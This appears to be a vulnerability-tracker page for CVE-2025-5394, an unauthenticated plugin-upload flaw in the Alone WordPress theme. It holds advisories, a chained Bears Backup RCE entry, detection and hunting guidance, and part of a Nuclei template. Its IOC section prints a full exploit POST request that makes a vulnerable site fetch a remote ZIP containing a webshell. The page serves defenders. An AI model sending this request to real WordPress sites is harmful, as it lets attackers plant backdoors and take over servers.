CVE-2025-5394
published 2025-07-15CVE-2025-5394: The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
47.81%
98.7th percentile
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3. This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution. CVE-2025-54019 is likely a duplicate of this.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bearsthemes | bears_backup | <= 2.0.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&data%5Bplugin_slug%5D=&data%5Bplugin_source%5D=https%3a%2f%2f<url>%2fplugin%2f<file>.zip
path/wp-content/themes/alone/
- →Monitor for POST requests to /wp-admin/admin-ajax.php with action=alone_import_pack_install_plugin or action=beplus_import_pack_install_plugin, which indicate exploitation attempts of CVE-2025-5394. ↗
- →Look for newly created administrator accounts, suspicious ZIP/plugin folders in the WordPress plugins directory, or newly installed file manager plugins as indicators of post-exploitation activity. ↗
- →The vulnerable function alone_import_pack_install_plugin() is exposed via the wp_ajax_nopriv_ hook, meaning it is accessible to unauthenticated users; alert on any unauthenticated AJAX calls invoking this action. ↗
- →Attackers supply a remote source URL in the POST data's plugin_source parameter pointing to a ZIP archive containing a webshell; inspect POST body for external URLs in the data[plugin_source] field. ↗
- →Attackers deploy password-protected PHP backdoors that allow persistent remote command execution via HTTP requests; hunt for newly uploaded PHP files in plugin directories following exploitation. ↗
- ·The Nuclei template uses the action parameter value 'beplus_import_pack_install_plugin', while Wordfence and BleepingComputer report the action as 'alone_import_pack_install_plugin'. Both action names should be monitored, as the template may reflect an alias or alternate hook name used in some theme versions.
- ·The vulnerability affects Alone theme versions up to and including 7.8.3; version 7.8.5 is the patched release. Version 7.8.4 is referenced in the Bears Backup chain (CVE-2025-5396) but is NOT the fixed version — only 7.8.5 is confirmed safe. ↗
- ·CVE-2025-5394 can be chained with CVE-2025-5396 (Bears Backup plugin RCE) on sites running Alone theme 7.8.4 and older, where the Alone theme flaw is used to install the Bears Backup plugin, which then enables full RCE. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mr9j-vgmq-cxhq: The Bears Backup plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2
ghsa_unreviewed·2025-07-17·CVSS 9.8
CVE-2025-5396 [CRITICAL] CWE-94 GHSA-mr9j-vgmq-cxhq: The Bears Backup plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2
The Bears Backup plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.0. This is due to the bbackup_ajax_handle() function not having a capability check, nor validating user supplied input passed directly to call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leverage to inject backdoors or create new administrative user accounts to name a few things. On WordPress sites running the Alone theme versions 7.8.4 and older, this can be chained with CVE-2025-5394 to install the Bears Backup plugin and achieve the same impact.
GHSA
GHSA-jg98-c5j8-6598: The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability ch
ghsa_unreviewed·2025-07-15
CVE-2025-5394 [CRITICAL] CWE-862 GHSA-jg98-c5j8-6598: The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability ch
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3. This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution.
VulnCheck
Missing Authorization
vulncheck·2025·CVSS 9.8
CVE-2025-5394 [CRITICAL] Missing Authorization
Missing Authorization
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3. This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution. CVE-2025-54019 is likely a duplicate of this.
Affected: Bearsthemes Alone – Charity Multipurpose Non-profit
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/blog/2025/07/attackers-actively-exploi
Suricata
ET WEB_SPECIFIC_APPS Citrix Netscaler ADC & Gateway Unauthenticated Out-of-Bounds Memory Read (CVE-2023-6549)
suricata·2025-07-02·CVSS 8.2
CVE-2023-6549 [HIGH] ET WEB_SPECIFIC_APPS Citrix Netscaler ADC & Gateway Unauthenticated Out-of-Bounds Memory Read (CVE-2023-6549)
ET WEB_SPECIFIC_APPS Citrix Netscaler ADC & Gateway Unauthenticated Out-of-Bounds Memory Read (CVE-2023-6549)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Citrix Netscaler ADC & Gateway Unauthenticated Out-of-Bounds Memory Read (CVE-2023-6549)"; flow:established,to_server; http.uri; content:"/nf/auth/startwebview.do"; fast_pattern; http.host; isdataat:5394; reference:url,bishopfox.com/blog/netscaler-adc-and-gateway-advisory; reference:cve,2023-6549; classtype:web-application-attack; sid:2063271; rev:1; metadata:affected_product Citrix, attack_target Server, created_at 2025_07_02, cve CVE_2023_6549, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2025_07_02, mitre_tactic_id TA0001, mitre_tactic_name Initi
Nuclei
Unauthenticated Arbitrary Plugin Upload in Alone Theme
nuclei·CVSS 9.8
CVE-2025-5394 [CRITICAL] Unauthenticated Arbitrary Plugin Upload in Alone Theme
Unauthenticated Arbitrary Plugin Upload in Alone Theme
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3.
Template:
id: CVE-2025-5394
info:
name: Unauthenticated Arbitrary Plugin Upload in Alone Theme
author: Nxploited,DhiyaneshDK
severity: critical
description: |
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3.
impact: |
This makes it possible for unauthenticated attackers to upload zip files
2025-07-15
Published
Exploited in the wild